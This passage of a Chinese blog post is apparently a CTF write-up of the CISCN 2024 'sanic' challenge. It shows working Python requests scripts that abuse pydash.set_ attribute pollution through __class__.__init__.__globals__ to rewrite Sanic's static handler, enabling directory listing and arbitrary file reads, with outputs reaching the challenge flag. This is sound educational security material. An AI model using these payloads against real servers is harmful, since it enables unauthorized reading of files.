class="keyword">class</span> <span class="title class_">Pollute</span>:</span><br><span class="line">    def __init__(self):</span><br><span class="line">        pass</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = <span class="built_in">Sanic</span>(<span class="string">&quot;__mp_main__&quot;</span>)</span><br><span class="line">app.<span class="built_in">static</span>(<span class="string">&quot;/static/&quot;</span>, <span class="string">&quot;./static/&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="built_in">exception</span>(Exception)</span><br><span class="line">async def <span class="built_in">show_error</span>(request, exception):</span><br><span class="line">    <span class="keyword">import</span> traceback</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">text</span>(traceback.format_exc(), status=<span class="number">500</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="built_in">route</span>(<span class="string">&quot;/src&quot;</span>)</span><br><span class="line">async def <span class="built_in">src</span>(request):</span><br><span class="line">    code = request.args.<span class="built_in">get</span>(<span class="string">&quot;Yang&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">        <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">text</span>(<span class="built_in">open</span>(__file__, encoding=<span class="string">&quot;utf-8&quot;</span>).<span class="built_in">read</span>())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="built_in">route</span>(<span class="string">&quot;/admin&quot;</span>, methods=[<span class="string">&quot;GET&quot;</span>, <span class="string">&quot;POST&quot;</span>])</span><br><span class="line">async def <span class="built_in">admin</span>(request):</span><br><span class="line">    key = request.json[<span class="string">&quot;key&quot;</span>]</span><br><span class="line">    value = request.json[<span class="string">&quot;value&quot;</span>]</span><br><span class="line">    <span class="keyword">if</span> key <span class="keyword">and</span> value <span class="keyword">and</span> <span class="built_in">type</span>(key) is str <span class="keyword">and</span> <span class="string">&quot;_.&quot;</span> <span class="keyword">not</span> in key:</span><br><span class="line">        pollute = <span class="built_in">Pollute</span>()</span><br><span class="line">        pydash.<span class="built_in">set_</span>(pollute, key, value)</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">text</span>(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">text</span>(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.<span class="built_in">run</span>(host=<span class="string">&quot;0.0.0.0&quot;</span>, debug=True, single_process=True)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为：运行 CTFSHOW CTFSHOWPAYLOAD SANIC BUILD FAST. RUN FAST.  MAIN  16:51:04 INFO: SANIC V25.1 MAIN 16:51:04 INFO: GOIN' FAST @ HTTP://0.0.0.0.0:8000 MAIN 16:51:04 INFO: APP: __MP_MAIN_ 可 16:51:04 INF0: MODE: DEBUG, SINGLE WORKER MAIN INFO: SERVER: SANIC, HTTP/1.1 MAIN 16:51:04 16:51:04 INF0: PYTHON: 3.11.9 MAIN MAIN 16:51:04 INFO: PLATFORM:WINDOWS-10-10.0.26200-SP0 MAIN 16:51:04 INF0: PACKAGES: SANIC-ROUTING-23.12.0 16:51:04 INF0: STARTING WORKER [37868] MAIN  16:51:04 INF0: WORKER READY [37868] MAIN -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781859078691-43a041bb-97de-4278-93a7-831b48208a8f.png"></p>
<p>然后访问127.0.0.1&#x2F;src</p>
<!-- 这是一张图片，ocr 内容为：示目 HTTP://127.0.0.1:8000/SRC @APP.EXCEPTION(EXCEPTION) ASYNC DEF SHOW_ERROR(REQUEST, EXCEPTION): IMPORT TRACEBACK RETURN TEXT(TRACEBACK.FORMAT_EXC(), STATUS-500) #@APP.ROUTE('/", METHODS-['GET', 'POST']) #ASYNE DEF INDEX(REQUEST); #RETURN HTML(OPEN( STATIC/INDEX.HTML').READO) #6APP.ROUTE("/LOGIN") HASYNC DEF LOGIN(REQUEST): #USER - REQUEST.COOKIES.GET(USER") #IF USER.LOWER0 -- 'ADM;N'; #REQUEST.CTX.SESSIONL ADMIN ] - TRUE #RETURN TEXT('LOGIN SUCCESS") #RETURN TEXT("LOGIN FAIL") @APP.ROUTE("/SRE")  ASYNC DEF SRC(REQUEST): TRY CODE REQUEST,ARGS,GET YANG IF CODE: CVAL(CODE) RETURN TEXT(OPEN( FILE_, ENCODING-"UTF-8").READ()) EXCEPT EXCEPTION: IMPORT TRACEBACK RETURN TEXT(TRACEBACK. FORMAT EXC(), STATUS-500) @APP.ROUTE("/ADMIN",METHODS-[CET','POST']) ASYNE DEF ADMIN(REQUEST): KEY-REQUEST. JSON[ KEY']  VALUE - REQUEST. JSON[ VALUE'] IF KEY AND VALUE AND TYPE(KEY) NOT IN KEY: ISSTRAND POLLUTE-POLLUTE0 PYDASH SET (POLLUTE, KEY, V VALUE)  RETURN TEXT( SUCCESS ) ELSE: RETURN TEXT("FORBIDDEN") IF 加A1N NAMO APP.RUN(HOST-'0.0.0.0', DEBUG-TRUE, SINGLE PROCESS-TRUE) -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781858604849-d61b1a8f-2229-4a19-b67c-af9d6eaa0004.png"></p>
<p>就可以看到我们的源码了</p>
<p>这里我们再污染一下这个</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://127.0.0.1:8000/admin&quot;</span></span><br><span class="line"></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&quot;key&quot;</span>: <span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: True,</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">response = requests.<span class="built_in">post</span>(url, json=data)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为：运行 CTFSHOW PAYLOAD CTFSHOW C:\USERS\22784\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON311\PYTHON.EXE C:\USERS\22784\PYCHARMHISCPROJECT\CTF\CTFSHOW_PAYLOAD.PY 个个与业品血 SUCCESS 进程已结束,退出代码为0 -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781858989040-12d7897c-56d3-425b-a99b-be7e558140db.png"></p>
<p>回显有success就证明污染成功了</p>
<p>然后我们接着访问</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/<span class="type">static</span></span><br></pre></td></tr></table></figure>

<p>可以看到我们目录下的文件了</p>
<!-- 这是一张图片，ocr 内容为：HTTP://127.0.0.1:8000/STATIC/ DIRECTORY VIEWER / STATIC / 10 2026-06-19 16:53:59 TEST.TXT -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781859329175-9b610dde-24ce-4b9a-9dec-22f201ddd4c4.png"></p>
<p>&#x2F;static&#x2F; 映射到当前工作目录下的 static 文件夹，C:\Users\22784\PyCharmMiscProject\ctf\static</p>
<p>C:\Users\22784\PyCharmMiscProject\ctf\static\test.txt</p>
<!-- 这是一张图片，ocr 内容为：HTTP://127.0.0.1:8000/STATIC/TEST.TXT STATIC OK -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781859431532-37adfe40-8358-40cf-9241-325c00b29f48.png"></p>
<p>可以看到我们这个目录下文件的内容</p>
<p>我们在我们用户目录创建一个本地flag，然后尝试污染</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://127.0.0.1:8000/admin&quot;</span></span><br><span class="line"></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&quot;key&quot;</span>: <span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.file_or_directory&quot;</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="string">&quot;C:\\Users\\22784&quot;</span>,</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">response = requests.<span class="built_in">post</span>(url, json=data)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为：C:\USERS\22784\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON311\PYTHON.EXE C:\USERS\22784\PYCHARMMISCPROJECT\CT千\CTFSHOW_PAYLOAD.PY SUCCESS 进程已结束,退出代码为0 -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781860353544-b70b61e5-87c7-4835-adb2-a842cfb6f460.png"></p>
<p>这里污染成功，那么我们直接访问试试</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1:8000/static/flag.txt</span></span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为：HTTP://127.0.0.1:8000/STATIC/FLAG.TXT FLAG{THE_F14G_ISCO_ROM RETURN MY_198 RMB} -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781860462834-98febb75-595f-40dc-a4a1-06f414225169.png"></p>
<p>访问成功看到我们创的一个flag，也就说明污染成功了</p>
<p>本质是 Python 原型链污染，也可以叫对象属性污染。攻击者通过可控的 key 和 value，让服务端执行：</p>
<p>pydash.set_(pollute, key, value)</p>
<p>从而沿着对象属性链一路写入到不该被外部用户控制的对象内部。</p>
<h3 id="pydash-set"><a href="#pydash-set" class="headerlink" title="pydash.set_"></a>pydash.set_</h3><p>pydash.set_(obj, path, value) 会按路径给对象设置属性。</p>
<p>例如：pydash.set_(pollute, “a.b.c”, 1)</p>
<p>等价于尝试设置：pollute.a.b.c &#x3D; 1</p>
<p>问题在于它支持复杂路径，并且可以访问 Python 对象的魔术属性，比如：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span></span><br><span class="line"><span class="title class_">init</span></span><br><span class="line">globals</span><br></pre></td></tr></table></figure>

<p>所以可以从一个普通对象跳到全局作用域。</p>
<h3 id="Python-魔术属性链"><a href="#Python-魔术属性链" class="headerlink" title="Python 魔术属性链"></a>Python 魔术属性链</h3><p>关键链路是：</p>
<p>pollute.<strong>class</strong>.<strong>init</strong>.<strong>globals</strong></p>
<p>含义：pollute.<strong>class</strong>拿到 Pollute 类。Pollute.<strong>init</strong>拿到 <strong>init</strong> 函数对象。Pollute.<strong>init</strong>.**globals。**拿到定义函数时所在模块的全局变量字典。</p>
<p>而全局变量里有：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app</span><br></pre></td></tr></table></figure>

<p>所以可以继续访问：app.router.name_index最终污染 Sanic 的内部对象。</p>
<h3 id="Sanic-静态路由对象"><a href="#Sanic-静态路由对象" class="headerlink" title="Sanic 静态路由对象"></a>Sanic 静态路由对象</h3><p>服务端注册了：app.static(“&#x2F;static&#x2F;“, “.&#x2F;static&#x2F;“)，Sanic 会在内部保存一个静态文件处理器。攻击目标就是修改这个处理器的配置。我的 Sanic 25.12.1 里实际可用的是：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">andler.keywords.directory_handler.directory_view</span><br><span class="line">handler.keywords.file_or_directory</span><br></pre></td></tr></table></figure>

<p> 所以本地最终 payload 是：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">  data = &#123;</span><br><span class="line">      <span class="string">&quot;key&quot;</span>: <span class="string">&quot;class\\.init\\.globals\\.app.router.name_index.mp_main</span></span><br><span class="line"><span class="string">.static.handler.keywords.file_or_directory&quot;</span>,</span><br><span class="line">      <span class="string">&quot;value&quot;</span>: <span class="string">&quot;C:\Users\22784&quot;</span>,</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<h3 id="目录浏览"><a href="#目录浏览" class="headerlink" title="目录浏览"></a>目录浏览</h3><p>第一步污染：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">directory_handler.directory_view = True</span><br></pre></td></tr></table></figure>

<p>作用是开启 &#x2F;static&#x2F; 的目录列表。</p>
<p>也就是让： <a target="_blank" rel="noopener" href="http://127.0.0.1:8000/static/">http://127.0.0.1:8000/static/</a>可以列目录。</p>
<h3 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>任意文件读取</h3><p>第二步污染：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file_or_directory = <span class="string">&quot;C:\Users\22784&quot;</span></span><br></pre></td></tr></table></figure>

<p>作用是把 &#x2F;static&#x2F; 映射目录从原来的：C:\Users\22784\PyCharmMiscProject\ctf\static，改成：C:\Users\22784</p>
<p> 于是访问：<a target="_blank" rel="noopener" href="http://127.0.0.1:8000/static/flag.txt">http://127.0.0.1:8000/static/flag.txt</a></p>
<p>实际读取的是：C:\Users\22784\flag.txt</p>
<p>这就形成了任意文件读取。</p>
<h2 id="ctfshow"><a href="#ctfshow" class="headerlink" title="ctfshow"></a>ctfshow</h2><p>因此我们就可以利用这个方法来污染这个题目</p>
<p>exp如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib3</span><br><span class="line">urllib<span class="number">3.</span><span class="built_in">disable_warnings</span>(urllib<span class="number">3.</span>exceptions.InsecureRequestWarning)</span><br><span class="line"></span><br><span class="line"># 目标靶机URL</span><br><span class="line">url = <span class="string">&#x27;https://76a1b7ff-982b-4374-bed8-14c9af3e7795.challenge.ctf.show/admin&#x27;</span></span><br><span class="line"># 步骤一：开启列目录</span><br><span class="line"><span class="meta"># data = &#123;</span></span><br><span class="line">#      <span class="string">&quot;key&quot;</span>: <span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span>,</span><br><span class="line">#     <span class="string">&quot;value&quot;</span>: True&#125;</span><br><span class="line"></span><br><span class="line"># 步骤二：将目录设置在根目录下 (执行完步骤一后再打开这个)</span><br><span class="line"><span class="meta"># data = &#123;<span class="string">&quot;key&quot;</span>:<span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts&quot;</span>,<span class="string">&quot;value&quot;</span>: [<span class="string">&quot;/&quot;</span>]&#125;</span></span><br><span class="line"></span><br><span class="line"># 步骤三：读取flag文件 (通过前两步找到 flag 文件名后，替换下面的路径)</span><br><span class="line">data = &#123;<span class="string">&quot;key&quot;</span>:<span class="string">&quot;__init__\\\\.__globals__\\\\.__file__&quot;</span>,<span class="string">&quot;value&quot;</span>: <span class="string">&quot;/24bcbd0192e591d6ded1_flag&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line">cookie = &#123;</span><br><span class="line">    <span class="string">&quot;session&quot;</span>: <span class="string">&quot;911f88f3304d426caeee17c61a482182&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[*] 正在发送攻击 payload...&quot;</span>)</span><br><span class="line">    # <span class="number">2.</span> 核心：必须带上 verify=False</span><br><span class="line">    response = requests.<span class="built_in">post</span>(url=url, json=data, cookies=cookie, verify=False)</span><br><span class="line">    # 打印出网页返回的结果</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] 请求完毕！服务器返回内容如下：&quot;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;-&quot;</span> * <span class="number">50</span>)</span><br><span class="line">    <span class="built_in">print</span>(response.text)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;-&quot;</span> * <span class="number">50</span>)</span><br><span class="line">except Exception as e:</span><br><span class="line">    <span class="built_in">print</span>(f<span class="string">&quot;[-] 请求发生了错误: &#123;e&#125;&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>运行成功返回success</p>
<!-- 这是一张图片，ocr 内容为：76A1B7F-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTFSHOW/STATIC/ 文A DIRECTORY VIEWER / STATIC / 4096 2024-05-19 20:21:38 APP/ 4096 2024-05-14 07:16:06 BIN/ BOOT/ 2024-01-28 21:20:00 4096 DEV/ 2026-06-19 0 07:09:57 340 2026-06-190 ETC/ 4096 07:09:56 2024-01-28 21:20:00 4096 HOME 05-1407:16:07 1IB/ 4096 2024- LIB64/ 2024-05-1300:00:00 4096 2024-05-13 00:00:00 4096 MEDIA/ 2024-05-1300:00:00 4096 MNT/ 4096 OPT/ 2024-05-13 00:00:00 2026-06-19 07:09:57 R PROC/ 4096 2024-05-19 20:26:30 ROOT/ 4096 2024-05-14 02:54:53 RUN/ SBIN/ 2024-05-14 02:55:28 4096 2024-05-13 00:00:00 4096 SRV/ 2026-06-17 04 SYS/ 04:21:24 07:09:58 4096 2026-06-19 TMP/ 2024-05-13 00:00:00 4096 USR 2024-05-13 4096 VAR/ 00:00:00 02026-06-19 DOCKERENV 07:09:56 24BCBD0192E591D6DED1_FLAG 46 2026-06-19 07:09:57 132  2024-05-19 20:25:52 START.SH -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854494887-93eb15ae-e0be-40da-913a-c2d05a20545a.png"></p>
<p>看到了根目录下flag的文件名字</p>
<!-- 这是一张图片，ocr 内容为：76A1B7FF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW/SRC CTFSHOW[77D429A5-D158-4026-A4C0-25278CCB5A20] -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854605887-714e15e3-43e4-4244-9e74-2af8bbdf5e85.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://apollo5211.github.io/2026/06/20/ciscn-2024-sanic/" data-id="cuid14YlRUh8nZJ2JGrgB6lw5" data-title="[CISCN 2024]sanic" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CISCN/" rel="tag">CISCN</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Sanic/" rel="tag">Sanic</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2026/06/20/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/Web/">Web</a></li></ul></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CISCN/" rel="tag">CISCN</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Sanic/" rel="tag">Sanic</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CISCN/" style="font-size: 10px;">CISCN</a> <a href="/tags/Python/" style="font-size: 10px;">Python</a> <a href="/tags/Sanic/" style="font-size: 10px;">Sanic</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/06/">June 2026</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2026/06/20/ciscn-2024-sanic/">[CISCN 2024]sanic</a>
          </li>
        
          <li>
            <a href="/2026/06/20/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2026 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>